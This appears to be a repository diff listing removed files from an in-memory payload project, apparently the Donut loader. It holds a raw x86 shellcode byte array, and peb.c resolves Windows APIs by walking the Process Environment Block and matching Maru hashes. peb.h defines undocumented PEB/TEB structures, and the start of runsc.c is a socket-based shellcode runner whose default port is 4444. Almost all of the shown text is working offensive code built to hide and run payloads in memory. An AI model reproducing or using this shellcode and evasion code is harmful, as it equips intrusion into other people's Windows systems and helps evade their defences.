567 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08,
568 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96,
569 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04,
570 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00,
571 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff,
572 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44,
573 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10,
574 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
575 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00,
576 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30,
577 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
578 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
579 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c,
580 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
581 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44,
582 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74,
583 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40,
584 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08,
585 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b,
586 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57,
587 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10,
588 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83,
589 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44,
590 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24,
591 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00,
592 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55,
593 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a,
594 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50,
595 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c,
596 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44,
597 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15,
598 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00,
599 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24,
600 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b,
601 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10,
602 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b,
603 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5,
604 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c,
605 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce,
606 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08,
607 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03,
608 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83,
609 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3,
610 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24,
611 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20,
612 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89,
613 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24,
614 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b,
615 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3,
616 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18,
617 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00,
618 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08,
619 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07,
620 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c,
621 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24,
622 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89,
623 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41,
624 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a,
625 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d,
626 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37,
627 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34,
628 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75,
629 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24,
630 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d,
631 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24,
632 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24,
633 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01,
634 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24,
635 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08,
636 0x5f, 0xc3};
637
+0
-149
payload/peb.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // locate address of API in export table using Maru hash function
32 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
33 PIMAGE_DOS_HEADER dos;
34 PIMAGE_NT_HEADERS nt;
35 DWORD i, j, cnt, rva;
36 PIMAGE_DATA_DIRECTORY dir;
37 PIMAGE_EXPORT_DIRECTORY exp;
38 PDWORD adr;
39 PDWORD sym;
40 PWORD ord;
41 PCHAR api, dll, p;
42 LPVOID addr=NULL;
43 ULONG64 dll_hash;
44 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
45
46 dos = (PIMAGE_DOS_HEADER)base;
47 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
48 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
49 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
50
51 // if no export table, return NULL
52 if (rva==0) return NULL;
53
54 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
55 cnt = exp->NumberOfNames;
56
57 // if no api names, return NULL
58 if (cnt==0) return NULL;
59
60 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
61 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
62 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
63 dll = RVA2VA(PCHAR, base, exp->Name);
64
65 // get hash of DLL string converted to lowercase
66 for(i=0;dll[i]!=0;i++) {
67 buf[i] = dll[i] | 0x20;
68 }
69 buf[i] = 0;
70 dll_hash = maru(buf, iv);
71
72 do {
73 // calculate hash of api string
74 api = RVA2VA(PCHAR, base, sym[cnt-1]);
75 // xor with DLL hash and compare with hash to find
76 if ((maru(api, iv) ^ dll_hash) == api_hash) {
77 // return address of function
78 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
79
80 // is this a forward reference?
81 if ((PBYTE)addr >= (PBYTE)exp &&
82 (PBYTE)addr < (PBYTE)exp +
83 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
84 {
85 DPRINT("%016llx is forwarded to %s",
86 api_hash, (char*)addr);
87
88 // copy DLL name to buffer
89 p=(char*)addr;
90
91 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
92 dll_name[i] = p[i];
93 if(p[i] == '.') break;
94 }
95
96 dll_name[i+1] = 'd';
97 dll_name[i+2] = 'l';
98 dll_name[i+3] = 'l';
99 dll_name[i+4] = 0;
100
101 p += i + 1;
102
103 // copy API name to buffer
104 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
105 api_name[i] = p[i];
106 }
107 api_name[i] = 0;
108
109 DPRINT("Trying to load %s", dll_name);
110 HMODULE hModule = inst->api.LoadLibrary(dll_name);
111
112 if(hModule != NULL) {
113 DPRINT("Calling GetProcAddress(%s)", api_name);
114 addr = inst->api.GetProcAddress(hModule, api_name);
115 } else addr = NULL;
116 }
117 return addr;
118 }
119 } while (--cnt && addr == NULL);
120
121 return addr;
122 }
123
124 // search all modules in the PEB for API
125 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
126 PPEB peb;
127 PPEB_LDR_DATA ldr;
128 PLDR_DATA_TABLE_ENTRY dte;
129 LPVOID addr = NULL;
130
131 #if defined(_WIN64)
132 peb = (PPEB) __readgsqword(0x60);
133 #else
134 peb = (PPEB) __readfsdword(0x30);
135 #endif
136
137 ldr = (PPEB_LDR_DATA)peb->Ldr;
138
139 // for each DLL loaded
140 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
141 dte->DllBase != NULL && addr == NULL;
142 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
143 {
144 // search the export table for api
145 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
146 }
147 return addr;
148 }
+0
-360
payload/peb.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _RTL_USER_PROCESS_PARAMETERS {
45 BYTE Reserved1[16];
46 PVOID Reserved2[10];
47 UNICODE_STRING ImagePathName;
48 UNICODE_STRING CommandLine;
49 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
50
51 // PEB defined by rewolf
52 // http://blog.rewolf.pl/blog/?p=573
53 typedef struct _PEB_LDR_DATA {
54 ULONG Length;
55 BOOL Initialized;
56 LPVOID SsHandle;
57 LIST_ENTRY InLoadOrderModuleList;
58 LIST_ENTRY InMemoryOrderModuleList;
59 LIST_ENTRY InInitializationOrderModuleList;
60 } PEB_LDR_DATA, *PPEB_LDR_DATA;
61
62 typedef struct _LDR_DATA_TABLE_ENTRY
63 {
64 LIST_ENTRY InLoadOrderLinks;
65 LIST_ENTRY InMemoryOrderLinks;
66 LIST_ENTRY InInitializationOrderLinks;
67 LPVOID DllBase;
68 LPVOID EntryPoint;
69 ULONG SizeOfImage;
70 UNICODE_STRING FullDllName;
71 UNICODE_STRING BaseDllName;
72 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
73
74 typedef struct _PEB {
75 BYTE InheritedAddressSpace;
76 BYTE ReadImageFileExecOptions;
77 BYTE BeingDebugged;
78 BYTE _SYSTEM_DEPENDENT_01;
79
80 LPVOID Mutant;
81 LPVOID ImageBaseAddress;
82
83 PPEB_LDR_DATA Ldr;
84 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
85 LPVOID SubSystemData;
86 LPVOID ProcessHeap;
87 LPVOID FastPebLock;
88 LPVOID _SYSTEM_DEPENDENT_02;
89 LPVOID _SYSTEM_DEPENDENT_03;
90 LPVOID _SYSTEM_DEPENDENT_04;
91 union {
92 LPVOID KernelCallbackTable;
93 LPVOID UserSharedInfoPtr;
94 };
95 DWORD SystemReserved;
96 DWORD _SYSTEM_DEPENDENT_05;
97 LPVOID _SYSTEM_DEPENDENT_06;
98 LPVOID TlsExpansionCounter;
99 LPVOID TlsBitmap;
100 DWORD TlsBitmapBits[2];
101 LPVOID ReadOnlySharedMemoryBase;
102 LPVOID _SYSTEM_DEPENDENT_07;
103 LPVOID ReadOnlyStaticServerData;
104 LPVOID AnsiCodePageData;
105 LPVOID OemCodePageData;
106 LPVOID UnicodeCaseTableData;
107 DWORD NumberOfProcessors;
108 union
109 {
110 DWORD NtGlobalFlag;
111 LPVOID dummy02;
112 };
113 LARGE_INTEGER CriticalSectionTimeout;
114 LPVOID HeapSegmentReserve;
115 LPVOID HeapSegmentCommit;
116 LPVOID HeapDeCommitTotalFreeThreshold;
117 LPVOID HeapDeCommitFreeBlockThreshold;
118 DWORD NumberOfHeaps;
119 DWORD MaximumNumberOfHeaps;
120 LPVOID ProcessHeaps;
121 LPVOID GdiSharedHandleTable;
122 LPVOID ProcessStarterHelper;
123 LPVOID GdiDCAttributeList;
124 LPVOID LoaderLock;
125 DWORD OSMajorVersion;
126 DWORD OSMinorVersion;
127 WORD OSBuildNumber;
128 WORD OSCSDVersion;
129 DWORD OSPlatformId;
130 DWORD ImageSubsystem;
131 DWORD ImageSubsystemMajorVersion;
132 LPVOID ImageSubsystemMinorVersion;
133 union
134 {
135 LPVOID ImageProcessAffinityMask;
136 LPVOID ActiveProcessAffinityMask;
137 };
138 #ifdef _WIN64
139 LPVOID GdiHandleBuffer[64];
140 #else
141 LPVOID GdiHandleBuffer[32];
142 #endif
143 LPVOID PostProcessInitRoutine;
144 LPVOID TlsExpansionBitmap;
145 DWORD TlsExpansionBitmapBits[32];
146 LPVOID SessionId;
147 ULARGE_INTEGER AppCompatFlags;
148 ULARGE_INTEGER AppCompatFlagsUser;
149 LPVOID pShimData;
150 LPVOID AppCompatInfo;
151 PUNICODE_STRING CSDVersion;
152 LPVOID ActivationContextData;
153 LPVOID ProcessAssemblyStorageMap;
154 LPVOID SystemDefaultActivationContextData;
155 LPVOID SystemAssemblyStorageMap;
156 LPVOID MinimumStackCommit;
157 } PEB, *PPEB;
158
159
160 typedef struct _CLIENT_ID {
161 HANDLE UniqueProcess;
162 HANDLE UniqueThread;
163 } CLIENT_ID, *PCLIENT_ID;
164
165 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
166 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
167 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
168 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
169
170 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
171 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
172 PACTIVATION_CONTEXT *ActivationContext;
173 ULONG Flags;
174 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
175
176 typedef struct _ACTIVATION_CONTEXT_STACK
177 {
178 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
179 LIST_ENTRY FrameListCache;
180 ULONG Flags;
181 ULONG NextCookieSequenceNumber;
182 ULONG StackId;
183 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
184 #define GDI_BATCH_BUFFER_SIZE 310
185
186 typedef struct _GDI_TEB_BATCH
187 {
188 ULONG Offset;
189 ULONG_PTR HDC;
190 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
191 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
192
193 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
194 {
195 ULONG Flags;
196 PSTR FrameName;
197 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
198
199 typedef struct _TEB_ACTIVE_FRAME
200 {
201 ULONG Flags;
202 struct _TEB_ACTIVE_FRAME *Previous;
203 PTEB_ACTIVE_FRAME_CONTEXT Context;
204 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
205
206 #if !defined(_MSC_VER)
207 typedef struct _PROCESSOR_NUMBER {
208 USHORT Group;
209 UCHAR Number;
210 UCHAR Reserved;
211 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
212 #endif
213
214 typedef struct _TEB
215 {
216 NT_TIB NtTib;
217
218 PVOID EnvironmentPointer;
219 CLIENT_ID ClientId;
220 PVOID ActiveRpcHandle;
221 PVOID ThreadLocalStoragePointer;
222 PPEB ProcessEnvironmentBlock;
223
224 ULONG LastErrorValue;
225 ULONG CountOfOwnedCriticalSections;
226 PVOID CsrClientThread;
227 PVOID Win32ThreadInfo;
228 ULONG User32Reserved[26];
229 ULONG UserReserved[5];
230 PVOID WOW32Reserved;
231 LCID CurrentLocale;
232 ULONG FpSoftwareStatusRegister;
233 PVOID SystemReserved1[54];
234 NTSTATUS ExceptionCode;
235 PVOID ActivationContextStackPointer;
236 #ifdef _M_X64
237 UCHAR SpareBytes[24];
238 #else
239 UCHAR SpareBytes[36];
240 #endif
241 ULONG TxFsContext;
242
243 GDI_TEB_BATCH GdiTebBatch;
244 CLIENT_ID RealClientId;
245 HANDLE GdiCachedProcessHandle;
246 ULONG GdiClientPID;
247 ULONG GdiClientTID;
248 PVOID GdiThreadLocalInfo;
249 ULONG_PTR Win32ClientInfo[62];
250 PVOID glDispatchTable[233];
251 ULONG_PTR glReserved1[29];
252 PVOID glReserved2;
253 PVOID glSectionInfo;
254 PVOID glSection;
255 PVOID glTable;
256 PVOID glCurrentRC;
257 PVOID glContext;
258
259 NTSTATUS LastStatusValue;
260 UNICODE_STRING StaticUnicodeString;
261 WCHAR StaticUnicodeBuffer[261];
262
263 PVOID DeallocationStack;
264 PVOID TlsSlots[64];
265 LIST_ENTRY TlsLinks;
266
267 PVOID Vdm;
268 PVOID ReservedForNtRpc;
269 PVOID DbgSsReserved[2];
270
271 ULONG HardErrorMode;
272 #ifdef _M_X64
273 PVOID Instrumentation[11];
274 #else
275 PVOID Instrumentation[9];
276 #endif
277 GUID ActivityId;
278
279 PVOID SubProcessTag;
280 PVOID EtwLocalData;
281 PVOID EtwTraceData;
282 PVOID WinSockData;
283 ULONG GdiBatchCount;
284
285 union
286 {
287 PROCESSOR_NUMBER CurrentIdealProcessor;
288 ULONG IdealProcessorValue;
289 struct
290 {
291 UCHAR ReservedPad0;
292 UCHAR ReservedPad1;
293 UCHAR ReservedPad2;
294 UCHAR IdealProcessor;
295 };
296 };
297
298 ULONG GuaranteedStackBytes;
299 PVOID ReservedForPerf;
300 PVOID ReservedForOle;
301 ULONG WaitingOnLoaderLock;
302 PVOID SavedPriorityState;
303 ULONG_PTR SoftPatchPtr1;
304 PVOID ThreadPoolData;
305 PVOID *TlsExpansionSlots;
306 #ifdef _M_X64
307 PVOID DeallocationBStore;
308 PVOID BStoreLimit;
309 #endif
310 ULONG MuiGeneration;
311 ULONG IsImpersonating;
312 PVOID NlsCache;
313 PVOID pShimData;
314 ULONG HeapVirtualAffinity;
315 HANDLE CurrentTransactionHandle;
316 PTEB_ACTIVE_FRAME ActiveFrame;
317 PVOID FlsData;
318
319 PVOID PreferredLanguages;
320 PVOID UserPrefLanguages;
321 PVOID MergedPrefLanguages;
322 ULONG MuiImpersonation;
323
324 union
325 {
326 USHORT CrossTebFlags;
327 USHORT SpareCrossTebBits : 16;
328 };
329 union
330 {
331 USHORT SameTebFlags;
332 struct
333 {
334 USHORT SafeThunkCall : 1;
335 USHORT InDebugPrint : 1;
336 USHORT HasFiberData : 1;
337 USHORT SkipThreadAttach : 1;
338 USHORT WerInShipAssertCode : 1;
339 USHORT RanProcessInit : 1;
340 USHORT ClonedThread : 1;
341 USHORT SuppressDebugMsg : 1;
342 USHORT DisableUserStackWalk : 1;
343 USHORT RtlExceptionAttached : 1;
344 USHORT InitialThread : 1;
345 USHORT SessionAware : 1;
346 USHORT SpareSameTebBits : 4;
347 };
348 };
349
350 PVOID TxnScopeEnterCallback;
351 PVOID TxnScopeExitCallback;
352 PVOID TxnScopeContext;
353 ULONG LockCount;
354 ULONG SpareUlong0;
355 PVOID ResourceRetValue;
356 PVOID ReservedForWdf;
357 } TEB, *PTEB;
358
359 #endif
+0
-734
payload/runsc.c less more
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
